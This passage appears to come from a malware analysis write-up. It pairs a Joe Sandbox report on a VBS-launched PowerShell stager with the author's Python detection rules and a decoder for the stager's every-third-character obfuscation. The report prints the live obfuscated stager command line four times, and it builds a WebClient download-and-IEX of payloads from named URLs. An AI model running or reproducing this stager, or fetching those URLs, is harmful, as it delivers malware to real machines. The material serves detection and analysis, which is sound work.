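the numeric thresholds are assumptions, not values stated in the report.
"""
import re
from pathlib import PureWindowsPath

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
LONG_CMDLINE = 2048   # assumed threshold for "very long cmdline"
MANY_LITERALS = 40    # assumed: benign one-liners rarely carry this many quoted strings

DISK_SERIAL_RE = re.compile(r"diskdrive\b.*\bserialnumber", re.IGNORECASE)
FUNC_DEF_RE = re.compile(r"\bfunction\s+\w+\s*\(", re.IGNORECASE)
QUOTED_RE = re.compile(r"'[^']*'")


def base(image: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(image).name.lower()


def evaluate(ev: dict) -> list:
    """Names of the rules one process-creation event trips, in rule order."""
    img, parent = base(ev["Image"]), base(ev["ParentImage"])
    cmd = ev.get("CommandLine", "")
    hits = []
    if parent in SCRIPT_HOSTS and img in POWERSHELL:
        hits.append("script_host_spawns_powershell")
    if img == "wmic.exe" and parent in SCRIPT_HOSTS and DISK_SERIAL_RE.search(cmd):
        hits.append("wmi_disk_serial_from_script_host")
    if img in POWERSHELL and len(cmd) > LONG_CMDLINE:
        hits.append("very_long_powershell_cmdline")
    if (img in POWERSHELL and FUNC_DEF_RE.search(cmd)
            and len(QUOTED_RE.findall(cmd)) >= MANY_LITERALS):
        hits.append("inline_decoder_with_many_literals")
    return hits


def triage(events) -> dict:
    """ProcessId -> rule hits for every event that tripped at least one rule."""
    return {ev["ProcessId"]: hits for ev in events if (hits := evaluate(ev))}


# Constructed stand-in for the stager's command line: same shape as the one in
# the report (decoder function followed by hundreds of short quoted literals).
STAGER_CMDLINE = (
    '";function Tilbageholdte($Satirisation){for ($j=2;;$j+=3)'
    '{if(!$Satirisation[$j]){break}$h+=$Satirisation[$j]}$h};'
    + ";".join(f"$v{i}=Tilbageholdte 'BeiEaEFrX'" for i in range(120))
)

SAMPLE_EVENTS = [  # constructed records, not captured telemetry
    {"ProcessId": 1001, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": STAGER_CMDLINE},
    {"ProcessId": 1002, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic diskdrive get caption,serialnumber"},
    {"ProcessId": 1003, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 1004, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption"},
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(hits))
```

The first two constructed events trip the rules the report's signatures describe; the explorer-launched script and the plain `wmic os get caption` do not. The parent-process condition on the WMIC rule matters: the same disk query from an inventory agent or an admin shell is routine, and it is the script-host parent that makes it worth a look.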

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match | File source: amsi64_1732.amsi.csv, type: OTHER
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. 
rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$polars229='afkvistning158';;$navier='kompetencegivende';;$ndudgangen9='semipreserved';;$straalepletten='knaldgassen';;$forhales=$host.name;function tilbageholdte($satirisation){if ($forhales) {$nonanarchically=2} for ($jurywoman=$nonanarchically;;$jurywoman+=3){if(!$satirisation[$jurywoman]){cls;break }$halomancy+=$satirisation[$jurywoman];$hiveward='schweizerostens'}$halomancy}function containeriseringers($taltes213){ .($murage) ($taltes213)}$plagen=tilbageholdte ' snree gt c. uw';$plagen+=tilbageholdte ' ae ab.lc.ule i eesin at';$moonscape=tilbageholdte 'b,mcoo,tz,hi sl,al cao /';$elegiker=tilbageholdte ' at tlflsto1fo2';$ungeneral='ar[t.npuem tm .bisdue rfev itrc oepap.ponaisunists.mriaamnbua nghaesdr m]kn:so:stsc esecfau yr ai uta,y rpalrmaou t okockootal,u=pe$ eeb.ls eflg oiomk bebir';$moonscape+=tilbageholdte 'mo5gu. u0la g( lw vikrnt d okawcosvi o.nhetre i1ae0 r.ap0sl;st ,ew si .nh 6bo4dr; u ,ix i6 h4o,;ke lur rva :pi1l 3fo1va.bu0ab) d ,gbae cdekhao /tr2va0re1e.0an0 m1as0ne1 l tifsei mrneesef codrx o/r 1cy3 t1.o.so0';$retransform=tilbageholdte ' fut sc,eteris-ska ag,eeren ct';$automatteoriens=tilbageholdte 'ruhsath.tspp jse :qu/ e/t w tw owkr. vfvitgasmae n gkris ntreste rl.str. ac rot.mf /rekspmg./remlyimecnarp.ohocovhthedri slreiw a l.sid kw.rp q> jh lt it.opevsfo:hy/ e/n w cwskwfu. opafu bn es.e itfa.tra eesl/hykrumga/ vme,ihuc crsmog cdrh .e hipalk iwaac,. 
rd w op';$sterne=tilbageholdte 'bi>';$murage=tilbageholdte 'beieaefrx';$svejsemestre='teddybjrnenes';$groteskes='\bethink.sal';containeriseringers (tilbageholdte 'k.$fogudl io.ebroa,mlk,:seecan herib rrh rchi scuedinaleh ssa=af$ .eflntrv i: fa upanp d.eamet akr+s,$kng cr,dok true osrek e.as');containeriseringers (tilbageholdte 'sc$ovg .ltho ,b eavrlsa:viluna,ngrer ci.rn.pg ssarfblo trs m .3re7go=e $ .a.juflt o om ha etlat.oethoc r pispefon rs a.klsn punl ri stho(sl$pesjet earrg n yemu)');containeriseringers (tilbageholdte $ungeneral);$automatteoriens=$lagringsform37[0];$bygders=(tilbageholdte ' p$brgt ls o sb.uac l : pbamis,rskgboisptquth ihjn merarfre bnsks .=f.nfief wst-smopebgyj behock,t us.nyjosstt ger m k.l $sap dlbial.g econ');containeriseringers ($bygders);containeriseringers (tilbageholdte '.o$prbpeicord gpri ftj.t .i sn hesorereannkus i.orhudearamid,eerarkosca[po$strheeg.tsar oa,insrsshfk.of rprms ]fa=gr$jemsto eoovnpas,dckua gpsie');$netmave=tilbageholdte ' s$ .bgoif.rreg,ai at dt si ,nn e mrs ehjns,s . .dbooflwb nudl oolrapedcafb itrlc e h(dr$aaa au ntprounmseamittots ediokor ireeanna,sri, $ vihunmaddioirpath yeornuni cnep)';$indophenin=$enebrrisenes;containeriseringers (tilbageholdte 't $,ngm.lstofeb ca.ol e:ini dnfuggoet f mr dm iab.rspmcoef lafab dgee o= f(.yt ee asbat f-atp,aa ,t ah i y$uni knchd .o ,punhude ,n ki ,nbe)');while (!$ingefrmarmelade) {containeriseringers (tilbageholdte ' e$ ig slbuobrbspa albl:m dfiedonnonlo
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$polars229='afkvistning158';;$navier='kompetencegivende';;$ndudgangen9='semipreserved';;$straalepletten='knaldgassen';;$forhales=$host.name;function tilbageholdte($satirisation){if ($forhales) {$nonanarchically=2} for ($jurywoman=$nonanarchically;;$jurywoman+=3){if(!$satirisation[$jurywoman]){cls;break }$halomancy+=$satirisation[$jurywoman];$hiveward='schweizerostens'}$halomancy}function containeriseringers($taltes213){ .($murage) ($taltes213)}$plagen=tilbageholdte ' snree gt c. uw';$plagen+=tilbageholdte ' ae ab.lc.ule i eesin at';$moonscape=tilbageholdte 'b,mcoo,tz,hi sl,al cao /';$elegiker=tilbageholdte ' at tlflsto1fo2';$ungeneral='ar[t.npuem tm .bisdue rfev itrc oepap.ponaisunists.mriaamnbua nghaesdr m]kn:so:stsc esecfau yr ai uta,y rpalrmaou t okockootal,u=pe$ eeb.ls eflg oiomk bebir';$moonscape+=tilbageholdte 'mo5gu. u0la g( lw vikrnt d okawcosvi o.nhetre i1ae0 r.ap0sl;st ,ew si .nh 6bo4dr; u ,ix i6 h4o,;ke lur rva :pi1l 3fo1va.bu0ab) d ,gbae cdekhao /tr2va0re1e.0an0 m1as0ne1 l tifsei mrneesef codrx o/r 1cy3 t1.o.so0';$retransform=tilbageholdte ' fut sc,eteris-ska ag,eeren ct';$automatteoriens=tilbageholdte 'ruhsath.tspp jse :qu/ e/t w tw owkr. vfvitgasmae n gkris ntreste rl.str. ac rot.mf /rekspmg./remlyimecnarp.ohocovhthedri slreiw a l.sid kw.rp q> jh lt it.opevsfo:hy/ e/n w cwskwfu. opafu bn es.e itfa.tra eesl/hykrumga/ vme,ihuc crsmog cdrh .e hipalk iwaac,. 
rd w op';$sterne=tilbageholdte 'bi>';$murage=tilbageholdte 'beieaefrx';$svejsemestre='teddybjrnenes';$groteskes='\bethink.sal';containeriseringers (tilbageholdte 'k.$fogudl io.ebroa,mlk,:seecan herib rrh rchi scuedinaleh ssa=af$ .eflntrv i: fa upanp d.eamet akr+s,$kng cr,dok true osrek e.as');containeriseringers (tilbageholdte 'sc$ovg .ltho ,b eavrlsa:viluna,ngrer ci.rn.pg ssarfblo trs m .3re7go=e $ .a.juflt o om ha etlat.oethoc r pispefon rs a.klsn punl ri stho(sl$pesjet earrg n yemu)');containeriseringers (tilbageholdte $ungeneral);$automatteoriens=$lagringsform37[0];$bygders=(tilbageholdte ' p$brgt ls o sb.uac l : pbamis,rskgboisptquth ihjn merarfre bnsks .=f.nfief wst-smopebgyj behock,t us.nyjosstt ger m k.l $sap dlbial.g econ');containeriseringers ($bygders);containeriseringers (tilbageholdte '.o$prbpeicord gpri ftj.t .i sn hesorereannkus i.orhudearamid,eerarkosca[po$strheeg.tsar oa,insrsshfk.of rprms ]fa=gr$jemsto eoovnpas,dckua gpsie');$netmave=tilbageholdte ' s$ .bgoif.rreg,ai at dt si ,nn e mrs ehjns,s . .dbooflwb nudl oolrapedcafb itrlc e h(dr$aaa au ntprounmseamittots ediokor ireeanna,sri, $ vihunmaddioirpath yeornuni cnep)';$indophenin=$enebrrisenes;containeriseringers (tilbageholdte 't $,ngm.lstofeb ca.ol e:ini dnfuggoet f mr dm iab.rspmcoef lafab dgee o= f(.yt ee asbat f-atp,aa ,t ah i y$uni knchd .o ,punhude ,n ki ,nbe)');while (!$ingefrmarmelade) {containeriseringers (tilbageholdte ' e$ ig slbuobrbspa albl:m dfiedonnonlo
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$polars229='afkvistning158';;$navier='kompetencegivende';;$ndudgangen9='semipreserved';;$straalepletten='knaldgassen';;$forhales=$host.name;function tilbageholdte($satirisation){if ($forhales) {$nonanarchically=2} for ($jurywoman=$nonanarchically;;$jurywoman+=3){if(!$satirisation[$jurywoman]){cls;break }$halomancy+=$satirisation[$jurywoman];$hiveward='schweizerostens'}$halomancy}function containeriseringers($taltes213){ .($murage) ($taltes213)}$plagen=tilbageholdte ' snree gt c. uw';$plagen+=tilbageholdte ' ae ab.lc.ule i eesin at';$moonscape=tilbageholdte 'b,mcoo,tz,hi sl,al cao /';$elegiker=tilbageholdte ' at tlflsto1fo2';$ungeneral='ar[t.npuem tm .bisdue rfev itrc oepap.ponaisunists.mriaamnbua nghaesdr m]kn:so:stsc esecfau yr ai uta,y rpalrmaou t okockootal,u=pe$ eeb.ls eflg oiomk bebir';$moonscape+=tilbageholdte 'mo5gu. u0la g( lw vikrnt d okawcosvi o.nhetre i1ae0 r.ap0sl;st ,ew si .nh 6bo4dr; u ,ix i6 h4o,;ke lur rva :pi1l 3fo1va.bu0ab) d ,gbae cdekhao /tr2va0re1e.0an0 m1as0ne1 l tifsei mrneesef codrx o/r 1cy3 t1.o.so0';$retransform=tilbageholdte ' fut sc,eteris-ska ag,eeren ct';$automatteoriens=tilbageholdte 'ruhsath.tspp jse :qu/ e/t w tw owkr. vfvitgasmae n gkris ntreste rl.str. ac rot.mf /rekspmg./remlyimecnarp.ohocovhthedri slreiw a l.sid kw.rp q> jh lt it.opevsfo:hy/ e/n w cwskwfu. opafu bn es.e itfa.tra eesl/hykrumga/ vme,ihuc crsmog cdrh .e hipalk iwaac,. 
rd w op';$sterne=tilbageholdte 'bi>';$murage=tilbageholdte 'beieaefrx';$svejsemestre='teddybjrnenes';$groteskes='\bethink.sal';containeriseringers (tilbageholdte 'k.$fogudl io.ebroa,mlk,:seecan herib rrh rchi scuedinaleh ssa=af$ .eflntrv i: fa upanp d.eamet akr+s,$kng cr,dok true osrek e.as');containeriseringers (tilbageholdte 'sc$ovg .ltho ,b eavrlsa:viluna,ngrer ci.rn.pg ssarfblo trs m .3re7go=e $ .a.juflt o om ha etlat.oethoc r pispefon rs a.klsn punl ri stho(sl$pesjet earrg n yemu)');containeriseringers (tilbageholdte $ungeneral);$automatteoriens=$lagringsform37[0];$bygders=(tilbageholdte ' p$brgt ls o sb.uac l : pbamis,rskgboisptquth ihjn merarfre bnsks .=f.nfief wst-smopebgyj behock,t us.nyjosstt ger m k.l $sap dlbial.g econ');containeriseringers ($bygders);containeriseringers (tilbageholdte '.o$prbpeicord gpri ftj.t .i sn hesorereannkus i.orhudearamid,eerarkosca[po$strheeg.tsar oa,insrsshfk.of rprms ]fa=gr$jemsto eoovnpas,dckua gpsie');$netmave=tilbageholdte ' s$ .bgoif.rreg,ai at dt si ,nn e mrs ehjns,s . .dbooflwb nudl oolrapedcafb itrlc e h(dr$aaa au ntprounmseamittots ediokor ireeanna,sri, $ vihunmaddioirpath yeornuni cnep)';$indophenin=$enebrrisenes;containeriseringers (tilbageholdte 't $,ngm.lstofeb ca.ol e:ini dnfuggoet f mr dm iab.rspmcoef lafab dgee o= f(.yt ee asbat f-atp,aa ,t ah i y$uni knchd .o ,punhude ,n ki ,nbe)');while (!$ingefrmarmelade) {containeriseringers (tilbageholdte ' e$ ig slbuobrbspa albl:m dfiedonnonlo
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (identical entry repeated 7 times)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (identical entry repeated 6 times)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
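The PowerShell command line captured above hides every real string behind `Tilbageholdte`, which rebuilds a string from a padded literal by walking it from index 2 in steps of 3 (`$Jurywoman=2`, `$Jurywoman+=3`) until it runs off the end, and `Containeriseringers`, which hands its argument to `.($Murage)`; `$Murage` decodes to `iEX`, so every decoded string is executed. The guard `If ($Forhales) {$Nonanarchically=2}` only tests that `$host.Name` is non-empty, which it is in any normal host. The decoder below is an added example, not part of the Joe Sandbox report and not the malware's own code: it re-implements the scheme and applies it to literals copied from the command line. The HTML export collapsed runs of spaces inside the longer literals (`$Ungeneral`, `$Bygders`, `$Netmave` and the URL string), so those come out garbled and are deliberately left out rather than guessed at; the short ones decode cleanly.

```python
"""Decoder for the string-hiding scheme in the captured PowerShell stager.

Added example, not part of the Joe Sandbox report and not the malware's code.
`Tilbageholdte` takes every third character of a padded literal starting at
index 2; `Containeriseringers` pipes the result into `.($Murage)`, where
`$Murage` decodes to `iEX`. The literals below are copied from the report's
command line; only those whose spacing survived the HTML export are included.
"""
import re

START, STRIDE = 2, 3   # $Nonanarchically = 2 whenever $host.Name is set (always, in practice)


def tilbageholdte(padded: str, start: int = START, stride: int = STRIDE) -> str:
    """Every `stride`-th character of `padded` from `start`; mirrors the PowerShell loop."""
    return padded[start::stride]


# Literals copied verbatim from the command line in the report.
LITERALS = {
    "$Plagen (first half)":  " SNRee gt c. Uw",
    "$Plagen (second half)": " ae aB.lC.ulE i EeSiN at",
    "$Moonscape (prefix)":   "B,MCoo,tz,hi Sl,al Cao /",
    "$elegiker":             " aT TlFlsto1Fo2",
    "$Retransform":          " FUT sC,eTeris-skA ag,eeRen Ct",
    "$Sterne":               "Bi>",
    "$Murage":               "BeiEaEFrX",
}


def decode_literals(literals=LITERALS) -> dict:
    """Variable name -> decoded string (the mixed case is the malware's own)."""
    return {name: tilbageholdte(text) for name, text in literals.items()}


# Matches `Tilbageholdte '<literal>'`; a doubled '' inside the literal is an escaped quote.
CALL_RE = re.compile(r"Tilbageholdte\s+'((?:[^']|'')*)'", re.IGNORECASE)


def decode_script(script: str) -> list:
    """Decode every inline `Tilbageholdte '<literal>'` call found in a captured script."""
    return [tilbageholdte(m.group(1).replace("''", "'")) for m in CALL_RE.finditer(script)]


if __name__ == "__main__":
    for name, value in decode_literals().items():
        print(f"{name:24} -> {value}")
```

Joined, the two `$Plagen` halves give `Net.weBClieNt` (PowerShell is case-insensitive, so this is `Net.WebClient`), `$elegiker` is `Tls12`, `$Retransform` is `User-Agent` and `$Moonscape` begins with `Mozilla/`: a WebClient download over TLS 1.2 with a browser-style User-Agent, which is what the report's "Powershell download and execute" and "known web browser user agent" signatures are reacting to. `$Sterne` is `>`, and a `>` also sits between the two `https://www.` fragments that decode out of `$Automatteoriens`. `decode_script` is the general form: point it at a full captured command line and it decodes every quoted literal passed to the function, which is the quickest way to triage the next sample that uses the same stride trick with different padding.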
MITRE ATT&CK Matrix (one column per tactic; the numeric prefixes are the report's per-cell signature counters, kept as extracted):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 221 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 121 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 121 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Antivirus and URL reputation results (Source | Detection | Scanner | Label):
S1a5ZF3ytp.vbs | 8% | ReversingLabs
No Antivirus matches
http://www.ftsengineers.com | 0% | Avira URL Cloud | safe
https://www.ftsengineers.com | 0% | Avira URL Cloud | safe
https://www.puneet.ae/km/microcheilia.dwp | 0% | Avira URL Cloud | safe
http://crl.micro_ | 0% | Avira URL Cloud | safe
https://www.ftsengineers.com/km/microcheilia.dwp | 0% | Avira URL Cloud | safe
http://ftsengineers.com | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
ftsengineers.com | 103.53.42.63 | true | false | - | unknown
www.ftsengineers.com | unknown | unknown | true | - | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
https://www.ftsengineers.com/km/microcheilia.dwp | false | Avira URL Cloud: safe | unknown

URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://www.ftsengineers.com | powershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://go.micro | powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ftsengineers.com | powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9AFD3000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://contoso.com/License | powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://ftsengineers.com | powershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.puneet.ae/km/microcheilia.dwp | powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
